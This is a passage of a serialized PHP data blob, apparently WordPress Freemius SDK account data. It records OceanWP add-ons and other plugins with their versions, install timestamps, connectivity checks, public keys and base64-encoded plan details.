-cookie-notice\";a:22:{s:16:\"plugin_main_file\";O:8:\"stdClass\":1:{s:4:\"path\";s:43:\"ocean-cookie-notice/ocean-cookie-notice.php\";}s:20:\"is_network_activated\";b:0;s:17:\"install_timestamp\";i:1573221867;s:17:\"was_plugin_loaded\";b:1;s:21:\"is_plugin_new_install\";b:0;s:16:\"sdk_last_version\";s:5:\"2.4.1\";s:11:\"sdk_version\";s:5:\"2.4.2\";s:16:\"sdk_upgrade_mode\";b:1;s:18:\"sdk_downgrade_mode\";b:0;s:19:\"plugin_last_version\";s:5:\"1.0.4\";s:14:\"plugin_version\";s:5:\"1.0.5\";s:19:\"plugin_upgrade_mode\";b:1;s:21:\"plugin_downgrade_mode\";b:0;s:17:\"connectivity_test\";a:6:{s:12:\"is_connected\";b:1;s:4:\"host\";s:9:\"localhost\";s:9:\"server_ip\";s:3:\"::1\";s:9:\"is_active\";b:1;s:9:\"timestamp\";i:1573221867;s:7:\"version\";s:5:\"1.0.4\";}s:15:\"prev_is_premium\";b:1;s:22:\"install_sync_timestamp\";i:1629055452;s:19:\"keepalive_timestamp\";i:1629055452;s:14:\"has_trial_plan\";b:0;s:9:\"sync_cron\";O:8:\"stdClass\":5:{s:7:\"version\";s:5:\"1.0.4\";s:7:\"blog_id\";i:0;s:11:\"sdk_version\";s:7:\"2.3.0.4\";s:9:\"timestamp\";i:1573221915;s:2:\"on\";b:1;}s:14:\"sync_timestamp\";i:1629055452;s:9:\"beta_data\";a:2:{s:7:\"is_beta\";b:0;s:7:\"version\";s:5:\"2.0.1\";}s:28:\"expired_license_notice_shown\";i:1628881943;}s:15:\"ocean-pro-demos\";a:21:{s:16:\"plugin_main_file\";O:8:\"stdClass\":1:{s:4:\"path\";s:35:\"ocean-pro-demos/ocean-pro-demos.php\";}s:20:\"is_network_activated\";b:0;s:17:\"install_timestamp\";i:1573221987;s:17:\"was_plugin_loaded\";b:1;s:21:\"is_plugin_new_install\";b:0;s:16:\"sdk_last_version\";N;s:11:\"sdk_version\";s:7:\"2.3.0.4\";s:16:\"sdk_upgrade_mode\";b:1;s:18:\"sdk_downgrade_mode\";b:0;s:19:\"plugin_last_version\";N;s:14:\"plugin_version\";s:5:\"1.1.0\";s:19:\"plugin_upgrade_mode\";b:1;s:21:\"plugin_downgrade_mode\";b:0;s:17:\"connectivity_test\";a:6:{s:12:\"is_connected\";b:1;s:4:\"host\";s:9:\"localhost\";s:9:\"server_ip\";s:3:\"::1\";s:9:\"is_active\";b:1;s:9:\"timestamp\";i:1573221987;s:7:\"version\";s:5:\"1.1.0\";}s:15:\"prev_is_premium\";b:1;s:22:\"install_sync_timestamp\";i:1573495010;s:19:\"keepalive_timestamp\";i:1573495010;s:14:\"has_trial_plan\";b:0;s:14:\"sync_timestamp\";i:1573416072;s:9:\"beta_data\";a:2:{s:7:\"is_beta\";b:0;s:7:\"version\";s:5:\"1.1.0\";}s:16:\"uninstall_reason\";O:8:\"stdClass\":3:{s:2:\"id\";s:1:\"3\";s:4:\"info\";s:0:\"\";s:12:\"is_anonymous\";b:0;}}s:22:\"content-aware-sidebars\";a:14:{s:16:\"plugin_main_file\";O:8:\"stdClass\":1:{s:4:\"path\";s:49:\"content-aware-sidebars/content-aware-sidebars.php\";}s:20:\"is_network_activated\";b:0;s:17:\"install_timestamp\";i:1573736250;s:17:\"was_plugin_loaded\";b:1;s:21:\"is_plugin_new_install\";b:0;s:16:\"sdk_last_version\";s:5:\"2.5.7\";s:11:\"sdk_version\";s:6:\"2.5.12\";s:16:\"sdk_upgrade_mode\";b:1;s:18:\"sdk_downgrade_mode\";b:0;s:19:\"plugin_last_version\";s:4:\"3.19\";s:14:\"plugin_version\";s:6:\"3.19.3\";s:19:\"plugin_upgrade_mode\";b:1;s:21:\"plugin_downgrade_mode\";b:0;s:17:\"connectivity_test\";a:6:{s:12:\"is_connected\";b:1;s:4:\"host\";s:16:\"ekmsliberia.info\";s:9:\"server_ip\";s:13:\"96.125.172.45\";s:9:\"is_active\";b:0;s:9:\"timestamp\";i:1676973250;s:7:\"version\";s:6:\"3.18.1\";}}s:4:\"pods\";a:17:{s:16:\"plugin_main_file\";O:8:\"stdClass\":1:{s:4:\"path\";s:13:\"pods/init.php\";}s:20:\"is_network_activated\";b:0;s:17:\"install_timestamp\";i:1603291677;s:17:\"was_plugin_loaded\";b:1;s:21:\"is_plugin_new_install\";b:0;s:16:\"sdk_last_version\";s:5:\"2.4.1\";s:11:\"sdk_version\";s:5:\"2.4.2\";s:16:\"sdk_upgrade_mode\";b:1;s:18:\"sdk_downgrade_mode\";b:0;s:19:\"plugin_last_version\";s:6:\"2.7.28\";s:14:\"plugin_version\";s:6:\"2.7.30\";s:19:\"plugin_upgrade_mode\";b:1;s:21:\"plugin_downgrade_mode\";b:0;s:17:\"connectivity_test\";a:6:{s:12:\"is_connected\";b:1;s:4:\"host\";s:16:\"ekmsliberia.info\";s:9:\"server_ip\";s:12:\"41.86.19.207\";s:9:\"is_active\";b:1;s:9:\"timestamp\";i:1603291677;s:7:\"version\";s:6:\"2.7.22\";}s:15:\"prev_is_premium\";b:0;s:18:\"sticky_optin_added\";b:1;s:12:\"is_anonymous\";a:3:{s:2:\"is\";b:1;s:9:\"timestamp\";i:1629384879;s:7:\"version\";s:6:\"2.7.30\";}}}s:7:\"plugins\";a:16:{s:20:\"ocean-custom-sidebar\";O:9:\"FS_Plugin\":24:{s:16:\"parent_plugin_id\";s:4:\"3752\";s:5:\"title\";s:20:\"Ocean Custom Sidebar\";s:4:\"slug\";s:20:\"ocean-custom-sidebar\";s:12:\"premium_slug\";s:20:\"ocean-custom-sidebar\";s:4:\"type\";s:6:\"plugin\";s:20:\"affiliate_moderation\";b:0;s:19:\"is_wp_org_compliant\";b:1;s:22:\"premium_releases_count\";N;s:4:\"file\";s:45:\"ocean-custom-sidebar/ocean-custom-sidebar.php\";s:7:\"version\";s:5:\"1.0.5\";s:11:\"auto_update\";N;s:4:\"info\";N;s:10:\"is_premium\";b:0;s:14:\"premium_suffix\";s:9:\"(Premium)\";s:7:\"is_live\";b:1;s:9:\"bundle_id\";N;s:17:\"bundle_public_key\";N;s:17:\"opt_in_moderation\";N;s:10:\"public_key\";s:32:\"pk_e1fc615375e847fd4d955c62b2a34\";s:10:\"secret_key\";N;s:2:\"id\";s:4:\"3810\";s:7:\"updated\";N;s:7:\"created\";N;s:22:\"\0FS_Entity\0_is_updated\";b:0;}s:18:\"ocean-modal-window\";O:9:\"FS_Plugin\":24:{s:16:\"parent_plugin_id\";s:4:\"3752\";s:5:\"title\";s:18:\"Ocean Modal Window\";s:4:\"slug\";s:18:\"ocean-modal-window\";s:12:\"premium_slug\";s:18:\"ocean-modal-window\";s:4:\"type\";s:6:\"plugin\";s:20:\"affiliate_moderation\";b:0;s:19:\"is_wp_org_compliant\";b:1;s:22:\"premium_releases_count\";N;s:4:\"file\";s:41:\"ocean-modal-window/ocean-modal-window.php\";s:7:\"version\";s:5:\"1.1.0\";s:11:\"auto_update\";N;s:4:\"info\";N;s:10:\"is_premium\";b:0;s:14:\"premium_suffix\";s:9:\"(Premium)\";s:7:\"is_live\";b:1;s:9:\"bundle_id\";N;s:17:\"bundle_public_key\";N;s:17:\"opt_in_moderation\";N;s:10:\"public_key\";s:32:\"pk_7e254472063a1abd3b7e342930210\";s:10:\"secret_key\";N;s:2:\"id\";s:4:\"3814\";s:7:\"updated\";N;s:7:\"created\";N;s:22:\"\0FS_Entity\0_is_updated\";b:0;}s:18:\"ocean-posts-slider\";O:9:\"FS_Plugin\":24:{s:16:\"parent_plugin_id\";s:4:\"3752\";s:5:\"title\";s:18:\"Ocean Posts Slider\";s:4:\"slug\";s:18:\"ocean-posts-slider\";s:12:\"premium_slug\";s:18:\"ocean-posts-slider\";s:4:\"type\";s:6:\"plugin\";s:20:\"affiliate_moderation\";b:0;s:19:\"is_wp_org_compliant\";b:1;s:22:\"premium_releases_count\";N;s:4:\"file\";s:41:\"ocean-posts-slider/ocean-posts-slider.php\";s:7:\"version\";s:5:\"2.0.0\";s:11:\"auto_update\";N;s:4:\"info\";N;s:10:\"is_premium\";b:0;s:14:\"premium_suffix\";s:9:\"(Premium)\";s:7:\"is_live\";b:1;s:9:\"bundle_id\";N;s:17:\"bundle_public_key\";N;s:17:\"opt_in_moderation\";N;s:10:\"public_key\";s:32:\"pk_eae1ef26c136dd8af5ef7a6cf7557\";s:10:\"secret_key\";N;s:2:\"id\";s:4:\"3813\";s:7:\"updated\";N;s:7:\"created\";N;s:22:\"\0FS_Entity\0_is_updated\";b:0;}s:20:\"ocean-social-sharing\";O:9:\"FS_Plugin\":24:{s:16:\"parent_plugin_id\";s:4:\"3752\";s:5:\"title\";s:20:\"Ocean Social Sharing\";s:4:\"slug\";s:20:\"ocean-social-sharing\";s:12:\"premium_slug\";s:20:\"ocean-social-sharing\";s:4:\"type\";s:6:\"plugin\";s:20:\"affiliate_moderation\";b:0;s:19:\"is_wp_org_compliant\";b:1;s:22:\"premium_releases_count\";N;s:4:\"file\";s:45:\"ocean-social-sharing/ocean-social-sharing.php\";s:7:\"version\";s:5:\"2.0.0\";s:11:\"auto_update\";N;s:4:\"info\";N;s:10:\"is_premium\";b:0;s:14:\"premium_suffix\";s:9:\"(Premium)\";s:7:\"is_live\";b:1;s:9:\"bundle_id\";N;s:17:\"bundle_public_key\";N;s:17:\"opt_in_moderation\";N;s:10:\"public_key\";s:32:\"pk_0aa6121ff893b29efa9a58d6c0ad5\";s:10:\"secret_key\";N;s:2:\"id\";s:4:\"3807\";s:7:\"updated\";N;s:7:\"created\";N;s:22:\"\0FS_Entity\0_is_updated\";b:0;}s:19:\"ocean-sticky-header\";O:9:\"FS_Plugin\":24:{s:16:\"parent_plugin_id\";s:4:\"3752\";s:5:\"title\";s:19:\"Ocean Sticky Header\";s:4:\"slug\";s:19:\"ocean-sticky-header\";s:12:\"premium_slug\";s:19:\"ocean-sticky-header\";s:4:\"type\";s:6:\"plugin\";s:20:\"affiliate_moderation\";b:0;s:19:\"is_wp_org_compliant\";b:1;s:22:\"premium_releases_count\";N;s:4:\"file\";s:43:\"ocean-sticky-header/ocean-sticky-header.php\";s:7:\"version\";s:5:\"1.2.0\";s:11:\"auto_update\";N;s:4:\"info\";N;s:10:\"is_premium\";b:1;s:14:\"premium_suffix\";s:9:\"(Premium)\";s:7:\"is_live\";b:1;s:9:\"bundle_id\";N;s:17:\"bundle_public_key\";N;s:17:\"opt_in_moderation\";N;s:10:\"public_key\";s:32:\"pk_21f01f3d0a79bcd65042e3c332188\";s:10:\"secret_key\";N;s:2:\"id\";s:4:\"3755\";s:7:\"updated\";N;s:7:\"created\";N;s:22:\"\0FS_Entity\0_is_updated\";b:0;}s:17:\"ocean-white-label\";O:9:\"FS_Plugin\":24:{s:16:\"parent_plugin_id\";s:4:\"3752\";s:5:\"title\";s:17:\"Ocean White Label\";s:4:\"slug\";s:17:\"ocean-white-label\";s:12:\"premium_slug\";s:17:\"ocean-white-label\";s:4:\"type\";s:6:\"plugin\";s:20:\"affiliate_moderation\";b:0;s:19:\"is_wp_org_compliant\";b:1;s:22:\"premium_releases_count\";N;s:4:\"file\";s:39:\"ocean-white-label/ocean-white-label.php\";s:7:\"version\";s:5:\"1.0.6\";s:11:\"auto_update\";N;s:4:\"info\";N;s:10:\"is_premium\";b:1;s:14:\"premium_suffix\";s:9:\"(Premium)\";s:7:\"is_live\";b:1;s:9:\"bundle_id\";N;s:17:\"bundle_public_key\";N;s:17:\"opt_in_moderation\";N;s:10:\"public_key\";s:32:\"pk_c9bb8f8d46af4c19cc2b66105accb\";s:10:\"secret_key\";N;s:2:\"id\";s:4:\"3762\";s:7:\"updated\";N;s:7:\"created\";N;s:22:\"\0FS_Entity\0_is_updated\";b:0;}s:16:\"ocean-side-panel\";O:9:\"FS_Plugin\":24:{s:16:\"parent_plugin_id\";s:4:\"3752\";s:5:\"title\";s:16:\"Ocean Side Panel\";s:4:\"slug\";s:16:\"ocean-side-panel\";s:12:\"premium_slug\";s:16:\"ocean-side-panel\";s:4:\"type\";s:6:\"plugin\";s:20:\"affiliate_moderation\";b:0;s:19:\"is_wp_org_compliant\";b:1;s:22:\"premium_releases_count\";N;s:4:\"file\";s:37:\"ocean-side-panel/ocean-side-panel.php\";s:7:\"version\";s:6:\"1.0.11\";s:11:\"auto_update\";N;s:4:\"info\";N;s:10:\"is_premium\";b:1;s:14:\"premium_suffix\";s:9:\"(Premium)\";s:7:\"is_live\";b:1;s:9:\"bundle_id\";N;s:17:\"bundle_public_key\";N;s:17:\"opt_in_moderation\";N;s:10:\"public_key\";s:32:\"pk_95ab9dabcffc015befcfaf19dd91e\";s:10:\"secret_key\";N;s:2:\"id\";s:4:\"3756\";s:7:\"updated\";N;s:7:\"created\";N;s:22:\"\0FS_Entity\0_is_updated\";b:0;}s:17:\"ocean-popup-login\";O:9:\"FS_Plugin\":24:{s:16:\"parent_plugin_id\";s:4:\"3752\";s:5:\"title\";s:17:\"Ocean Popup Login\";s:4:\"slug\";s:17:\"ocean-popup-login\";s:12:\"premium_slug\";s:17:\"ocean-popup-login\";s:4:\"type\";s:6:\"plugin\";s:20:\"affiliate_moderation\";b:0;s:19:\"is_wp_org_compliant\";b:1;s:22:\"premium_releases_count\";N;s:4:\"file\";s:39:\"ocean-popup-login/ocean-popup-login.php\";s:7:\"version\";s:5:\"1.2.0\";s:11:\"auto_update\";N;s:4:\"info\";N;s:10:\"is_premium\";b:1;s:14:\"premium_suffix\";s:9:\"(Premium)\";s:7:\"is_live\";b:1;s:9:\"bundle_id\";N;s:17:\"bundle_public_key\";N;s:17:\"opt_in_moderation\";N;s:10:\"public_key\";s:32:\"pk_e0499681c773af2bbac0016bb24ff\";s:10:\"secret_key\";N;s:2:\"id\";s:4:\"3764\";s:7:\"updated\";N;s:7:\"created\";N;s:22:\"\0FS_Entity\0_is_updated\";b:0;}s:11:\"ocean-hooks\";O:9:\"FS_Plugin\":24:{s:16:\"parent_plugin_id\";s:4:\"3752\";s:5:\"title\";s:11:\"Ocean Hooks\";s:4:\"slug\";s:11:\"ocean-hooks\";s:12:\"premium_slug\";s:11:\"ocean-hooks\";s:4:\"type\";s:6:\"plugin\";s:20:\"affiliate_moderation\";b:0;s:19:\"is_wp_org_compliant\";b:1;s:22:\"premium_releases_count\";N;s:4:\"file\";s:27:\"ocean-hooks/ocean-hooks.php\";s:7:\"version\";s:5:\"1.1.2\";s:11:\"auto_update\";N;s:4:\"info\";N;s:10:\"is_premium\";b:1;s:14:\"premium_suffix\";s:9:\"(Premium)\";s:7:\"is_live\";b:1;s:9:\"bundle_id\";N;s:17:\"bundle_public_key\";N;s:17:\"opt_in_moderation\";N;s:10:\"public_key\";s:32:\"pk_bf5672ee85c0032b2b4d7c0a3d244\";s:10:\"secret_key\";N;s:2:\"id\";s:4:\"3758\";s:7:\"updated\";N;s:7:\"created\";N;s:22:\"\0FS_Entity\0_is_updated\";b:0;}s:17:\"ocean-full-screen\";O:9:\"FS_Plugin\":24:{s:16:\"parent_plugin_id\";s:4:\"3752\";s:5:\"title\";s:17:\"Ocean Full Screen\";s:4:\"slug\";s:17:\"ocean-full-screen\";s:12:\"premium_slug\";s:17:\"ocean-full-screen\";s:4:\"type\";s:6:\"plugin\";s:20:\"affiliate_moderation\";b:0;s:19:\"is_wp_org_compliant\";b:1;s:22:\"premium_releases_count\";N;s:4:\"file\";s:39:\"ocean-full-screen/ocean-full-screen.php\";s:7:\"version\";s:5:\"1.0.6\";s:11:\"auto_update\";N;s:4:\"info\";N;s:10:\"is_premium\";b:1;s:14:\"premium_suffix\";s:9:\"(Premium)\";s:7:\"is_live\";b:1;s:9:\"bundle_id\";N;s:17:\"bundle_public_key\";N;s:17:\"opt_in_moderation\";N;s:10:\"public_key\";s:32:\"pk_e0f5fb19e66d3b97f64adb891fae5\";s:10:\"secret_key\";N;s:2:\"id\";s:4:\"3766\";s:7:\"updated\";N;s:7:\"created\";N;s:22:\"\0FS_Entity\0_is_updated\";b:0;}s:20:\"ocean-footer-callout\";O:9:\"FS_Plugin\":24:{s:16:\"parent_plugin_id\";s:4:\"3752\";s:5:\"title\";s:20:\"Ocean Footer Callout\";s:4:\"slug\";s:20:\"ocean-footer-callout\";s:12:\"premium_slug\";s:20:\"ocean-footer-callout\";s:4:\"type\";s:6:\"plugin\";s:20:\"affiliate_moderation\";b:0;s:19:\"is_wp_org_compliant\";b:1;s:22:\"premium_releases_count\";N;s:4:\"file\";s:45:\"ocean-footer-callout/ocean-footer-callout.php\";s:7:\"version\";s:6:\"1.0.13\";s:11:\"auto_update\";N;s:4:\"info\";N;s:10:\"is_premium\";b:1;s:14:\"premium_suffix\";s:9:\"(Premium)\";s:7:\"is_live\";b:1;s:9:\"bundle_id\";N;s:17:\"bundle_public_key\";N;s:17:\"opt_in_moderation\";N;s:10:\"public_key\";s:32:\"pk_c3ff094ed1cbaf287c6f833d3ba09\";s:10:\"secret_key\";N;s:2:\"id\";s:4:\"3754\";s:7:\"updated\";N;s:7:\"created\";N;s:22:\"\0FS_Entity\0_is_updated\";b:0;}s:23:\"ocean-elementor-widgets\";O:9:\"FS_Plugin\":24:{s:16:\"parent_plugin_id\";s:4:\"3752\";s:5:\"title\";s:23:\"Ocean Elementor Widgets\";s:4:\"slug\";s:23:\"ocean-elementor-widgets\";s:12:\"premium_slug\";s:23:\"ocean-elementor-widgets\";s:4:\"type\";s:6:\"plugin\";s:20:\"affiliate_moderation\";b:0;s:19:\"is_wp_org_compliant\";b:1;s:22:\"premium_releases_count\";N;s:4:\"file\";s:51:\"ocean-elementor-widgets/ocean-elementor-widgets.php\";s:7:\"version\";s:5:\"1.2.3\";s:11:\"auto_update\";N;s:4:\"info\";N;s:10:\"is_premium\";b:1;s:14:\"premium_suffix\";s:9:\"(Premium)\";s:7:\"is_live\";b:1;s:9:\"bundle_id\";N;s:17:\"bundle_public_key\";N;s:17:\"opt_in_moderation\";N;s:10:\"public_key\";s:32:\"pk_25eeed8cddc1b8bede158756886e8\";s:10:\"secret_key\";N;s:2:\"id\";s:4:\"3757\";s:7:\"updated\";N;s:7:\"created\";N;s:22:\"\0FS_Entity\0_is_updated\";b:0;}s:19:\"ocean-cookie-notice\";O:9:\"FS_Plugin\":24:{s:16:\"parent_plugin_id\";s:4:\"3752\";s:5:\"title\";s:19:\"Ocean Cookie Notice\";s:4:\"slug\";s:19:\"ocean-cookie-notice\";s:12:\"premium_slug\";s:19:\"ocean-cookie-notice\";s:4:\"type\";s:6:\"plugin\";s:20:\"affiliate_moderation\";b:0;s:19:\"is_wp_org_compliant\";b:1;s:22:\"premium_releases_count\";N;s:4:\"file\";s:43:\"ocean-cookie-notice/ocean-cookie-notice.php\";s:7:\"version\";s:5:\"1.0.5\";s:11:\"auto_update\";N;s:4:\"info\";N;s:10:\"is_premium\";b:1;s:14:\"premium_suffix\";s:9:\"(Premium)\";s:7:\"is_live\";b:1;s:9:\"bundle_id\";N;s:17:\"bundle_public_key\";N;s:17:\"opt_in_moderation\";N;s:10:\"public_key\";s:32:\"pk_2ebffcd411ce5f21e543822065b7d\";s:10:\"secret_key\";N;s:2:\"id\";s:4:\"3765\";s:7:\"updated\";N;s:7:\"created\";N;s:22:\"\0FS_Entity\0_is_updated\";b:0;}s:15:\"ocean-pro-demos\";O:9:\"FS_Plugin\":24:{s:16:\"parent_plugin_id\";s:4:\"3752\";s:5:\"title\";s:15:\"Ocean Pro Demos\";s:4:\"slug\";s:15:\"ocean-pro-demos\";s:12:\"premium_slug\";s:15:\"ocean-pro-demos\";s:4:\"type\";s:6:\"plugin\";s:20:\"affiliate_moderation\";b:0;s:19:\"is_wp_org_compliant\";b:1;s:22:\"premium_releases_count\";N;s:4:\"file\";s:35:\"ocean-pro-demos/ocean-pro-demos.php\";s:7:\"version\";s:5:\"1.1.0\";s:11:\"auto_update\";N;s:4:\"info\";N;s:10:\"is_premium\";b:1;s:14:\"premium_suffix\";s:9:\"(Premium)\";s:7:\"is_live\";b:1;s:9:\"bundle_id\";N;s:17:\"bundle_public_key\";N;s:17:\"opt_in_moderation\";N;s:10:\"public_key\";s:32:\"pk_a34c58ab5e7159d54e88175c1c03f\";s:10:\"secret_key\";N;s:2:\"id\";s:4:\"3797\";s:7:\"updated\";N;s:7:\"created\";N;s:22:\"\0FS_Entity\0_is_updated\";b:0;}s:22:\"content-aware-sidebars\";O:9:\"FS_Plugin\":24:{s:16:\"parent_plugin_id\";N;s:5:\"title\";s:22:\"Content Aware Sidebars\";s:4:\"slug\";s:22:\"content-aware-sidebars\";s:12:\"premium_slug\";s:30:\"content-aware-sidebars-premium\";s:4:\"type\";s:6:\"plugin\";s:20:\"affiliate_moderation\";s:8:\"selected\";s:19:\"is_wp_org_compliant\";b:1;s:22:\"premium_releases_count\";N;s:4:\"file\";s:49:\"content-aware-sidebars/content-aware-sidebars.php\";s:7:\"version\";s:6:\"3.19.3\";s:11:\"auto_update\";N;s:4:\"info\";N;s:10:\"is_premium\";b:0;s:14:\"premium_suffix\";s:3:\"Pro\";s:7:\"is_live\";b:1;s:9:\"bundle_id\";N;s:17:\"bundle_public_key\";N;s:17:\"opt_in_moderation\";N;s:10:\"public_key\";s:32:\"pk_75513325effa77f024565ef74c9d6\";s:10:\"secret_key\";N;s:2:\"id\";s:3:\"259\";s:7:\"updated\";N;s:7:\"created\";N;s:22:\"\0FS_Entity\0_is_updated\";b:1;}s:4:\"pods\";O:9:\"FS_Plugin\":24:{s:16:\"parent_plugin_id\";N;s:5:\"title\";s:38:\"Pods - Custom Content Types and Fields\";s:4:\"slug\";s:4:\"pods\";s:12:\"premium_slug\";s:12:\"pods-premium\";s:4:\"type\";s:6:\"plugin\";s:20:\"affiliate_moderation\";b:0;s:19:\"is_wp_org_compliant\";b:1;s:22:\"premium_releases_count\";N;s:4:\"file\";s:13:\"pods/init.php\";s:7:\"version\";s:6:\"2.7.30\";s:11:\"auto_update\";N;s:4:\"info\";N;s:10:\"is_premium\";b:0;s:14:\"premium_suffix\";s:9:\"(Premium)\";s:7:\"is_live\";b:1;s:9:\"bundle_id\";N;s:17:\"bundle_public_key\";N;s:17:\"opt_in_moderation\";N;s:10:\"public_key\";s:32:\"pk_737105490825babae220297e18920\";s:10:\"secret_key\";N;s:2:\"id\";s:4:\"5347\";s:7:\"updated\";N;s:7:\"created\";N;s:22:\"\0FS_Entity\0_is_updated\";b:0;}}s:5:\"plans\";a:14:{s:20:\"ocean-custom-sidebar\";a:1:{i:0;O:14:\"FS_Plugin_Plan\":21:{s:9:\"plugin_id\";s:8:\"MzgxMA==\";s:4:\"name\";s:8:\"ZnJlZQ==\";s:5:\"title\";s:8:\"RnJlZQ==\";s:11:\"description\";N;s:17:\"is_free_localhost\";s:4:\"MQ==\";s:17:\"is_block_features\";s:4:\"MQ==\";s:12:\"license_type\";s:4:\"MA==\";s:16:\"is_https_support\";s:0:\"\";s:12:\"trial_period\";N;s:23:\"is_require_subscription\";s:0:\"\";s:10:\"support_kb\";N;s:13:\"support_forum\";N;s:13:\"support_email\";N;s:13:\"support_phone\";N;s:13:\"support_skype\";N;s:18:\"is_success_manager\";s:0:\"\";s:11:\"is_featured\";s:0:\"\";s:2:\"id\";s:8:\"NjEzNg==\";s:7:\"updated\";N;s:7:\"created\";s:28:\"MjAxOS0wNS0xNiAwODowNDowOA==\";s:22:\"\0FS_Entity\0_is_updated\";b:0;}}s:18:\"ocean-modal-window\";a:1:{i:0;O:14:\"FS_Plugin_Plan\":21:{s:9:\"plugin_id\";s:8:\"MzgxNA==\";s:4:\"name\";s:8:\"ZnJlZQ==\";s:5:\"title\";s:8:\"RnJlZQ==\";s:11:\"description\";N;s:17:\"is_free_localhost\";s:4:\"MQ==\";s:17:\"is_block_features\";s:4:\"MQ==\";s:12:\"license_type\";s:4:\"MA==\";s:16:\"is_https_support\";s:0:\"\";s:12:\"trial_period\";N;s:23:\"is_require_subscription\";s:0:\"\";s:10:\"support_kb\";N;s:13:\"support_forum\";N;s:13:\"support_email\";N;s:13:\"support_phone\";N;s:13:\"support_skype\";N;s:18:\"is_success_manager\";s:0:\"\";s:11:\"is_featured\";s:0:\"\";s:2:\"id\";s:8:\"NjE0MA==\";s:7:\"updated\";N;s:7:\"created\";s:28:\"MjAxOS0wNS0xNiAwODoxMDoyOA==\";s:22:\"\0FS_Entity\0_is_updated\";b:0;}}s:18:\"ocean-posts-slider\";a:1:{i:0;O:14:\"FS_Plugin_Plan\":21:{s:9:\"plugin_id\";s:8:\"MzgxMw==\";s:4:\"name\";s:8:\"ZnJlZQ==\";s:5:\"title\";s:8:\"RnJlZQ==\";s:11:\"description\";N;s:17:\"is_free_localhost\";s:4:\"MQ==\";s:17:\"is_block_features\";s:4:\"MQ==\";s:12:\"license_type\";s:4:\"MA==\";s:16:\"is_https_support\";s:0:\"\";s:12:\"trial_period\";N;s:23:\"is_require_subscription\";s:0:\"\";s:10:\"support_kb\";N;s:13:\"support_forum\";N;s:13:\"support_email\";N;s:13:\"support_phone\";N;s:13:\"support_skype\";N;s:18:\"is_success_manager\";s:0:\"\";s:11:\"is_featured\";s:0:\"\";s:2:\"id\";s:8:\"NjEzOQ==\";s:7:\"updated\";N;s:7:\"created\";s:28:\"MjAxOS0wNS0xNiAwODowODoyNg==\";s:22:\"\0FS_Entity\0_is_updated\";b:0;}}s:20:\"ocean-social-sharing\";a:1:{i:0;O:14:\"FS_Plugin_Plan\":21:{s:9:\"plugin_id\";s:8:\"MzgwNw==\";s:4:\"name\";s:8:\"ZnJlZQ==\";s:5:\"title\";s:8:\"RnJlZQ==\";s:11:\"description\";N;s:17:\"is_free_localhost\";s:4:\"MQ==\";s:17:\"is_block_features\";s:4:\"MQ==\";s:12:\"license_type\";s:4:\"MA==\";s:16:\"is_https_support\";s:0:\"\";s:12:\"trial_period\";N;s:23:\"is_require_subscription\";s:0:\"\";s:10:\"support_kb\";N;s:13:\"support_forum\";N;s:13:\"support_email\";N;s:13:\"support_phone\";N;s:13:\"support_skype\";N;s:18:\"is_success_manager\";s:0:\"\";s:11:\"is_featured\";s:0:\"\";s:2:\"id\";s:8:\"NjEzMg==\";s:7:\"updated\";N;s:7:\"created\";s:28:\"MjAxOS0wNS0xNiAwNzo1MzozOA==\";s:22:\"\0FS_Entity\0_is_updated\";b:0;}}s:19:\"ocean-sticky-header\";a:1:{i:0;O:14:\"FS_Plugin_Plan\":21:{s:9:\"plugin_id\";s:8:\"Mzc1NQ==\";s:4:\"name\";s:4:\"cHJv\";s:5:\"title\";s:4:\"UHJv\";s:11:\"description\";N;s:17:\"is_free_localhost\";s:4:\"MQ==\";s:17:\"is_block_features\";s:0:\"\";s:12:\"license_type\";s:4:\"MA==\";s:16:\"is_https_support\";s:0:\"\";s:12:\"trial_period\";N;s:23:\"is_require_subscription\";s:0:\"\";s:10:\"support_kb\";s:36:\"aHR0cHM6Ly9kb2NzLm9jZWFud3Aub3JnLw==\";s:13:\"support_forum\";N;s:13:\"support_email\";s:28:\"c3VwcG9ydEBvY2VhbndwLm9yZw==\";s:13:\"support_phone\";N;s:13:\"support_skype\";N;s:18:\"is_success_manager\";s:0:\"\";s:11:\"is_featured\";s:4:\"MQ==\";s:2:\"id\";s:8:\"NjA3OA==\";s:7:\"updated\";s:28:\"MjAxOS0wNS0wOCAxNTowNjo0MA==\";s:7:\"created\";s:28:\"MjAxOS0wNS0wOCAxNTowNjoyOA==\";s:22:\"\0FS_Entity\0_is_updated\";b:0;}}s:17:\"ocean-white-label\";a:1:{i:0;O:14:\"FS_Plugin_Plan\":21:{s:9:\"plugin_id\";s:8:\"Mzc2Mg==\";s:4:\"name\";s:4:\"cHJv\";s:5:\"title\";s:4:\"UHJv\";s:11:\"description\";N;s:17:\"is_free_localhost\";s:4:\"MQ==\";s:17:\"is_block_features\";s:0:\"\";s:12:\"license_type\";s:4:\"MA==\";s:16:\"is_https_support\";s:0:\"\";s:12:\"trial_period\";N;s:23:\"is_require_subscription\";s:0:\"\";s:10:\"support_kb\";s:36:\"aHR0cHM6Ly9kb2NzLm9jZWFud3Aub3JnLw==\";s:13:\"support_forum\";N;s:13:\"support_email\";s:28:\"c3VwcG9ydEBvY2VhbndwLm9yZw==\";s:13:\"support_phone\";N;s:13:\"support_skype\";N;s:18:\"is_success_manager\";s:0:\"\";s:11:\"is_featured\";s:4:\"MQ==\";s:2:\"id\";s:8:\"NjA3MQ==\";s:7:\"updated\";s:28:\"MjAxOS0wNS0wOCAxNTowMjo1Nw==\";s:7:\"created\";s:28:\"MjAxOS0wNS0wOCAxNTowMjo0OA==\";s:22:\"\0FS_Entity\0_is_updated\";b:0;}}s:16:\"ocean-side-panel\";a:1:{i:0;O:14:\"FS_Plugin_Plan\":21:{s:9:\"plugin_id\";s:8:\"Mzc1Ng==\";s:4:\"name\";s:4:\"cHJv\";s:5:\"title\";s:4:\"UHJv\";s:11:\"description\";N;s:17:\"is_free_localhost\";s:0:\"\";s:17:\"is_block_features\";s:0:\"\";s:12:\"license_type\";s:4:\"MA==\";s:16:\"is_https_support\";s:0:\"\";s:12:\"trial_period\";N;s:23:\"is_require_subscription\";s:0:\"\";s:10:\"support_kb\";s:36:\"aHR0cHM6Ly9kb2NzLm9jZWFud3Aub3JnLw==\";s:13:\"support_forum\";N;s:13:\"support_email\";s:28:\"c3VwcG9ydEBvY2VhbndwLm9yZw==\";s:13:\"support_phone\";N;s:13:\"support_skype\";N;s:18:\"is_success_manager\";s:0:\"\";s:11:\"is_featured\";s:4:\"MQ==\";s:2:\"id\";s:8:\"NjA3Nw==\";s:7:\"updated\";s:28:\"MjAxOS0wNS0wOCAxNzoyMTozMA==\";s:7:\"created\";s:28:\"MjAxOS0wNS0wOCAxNTo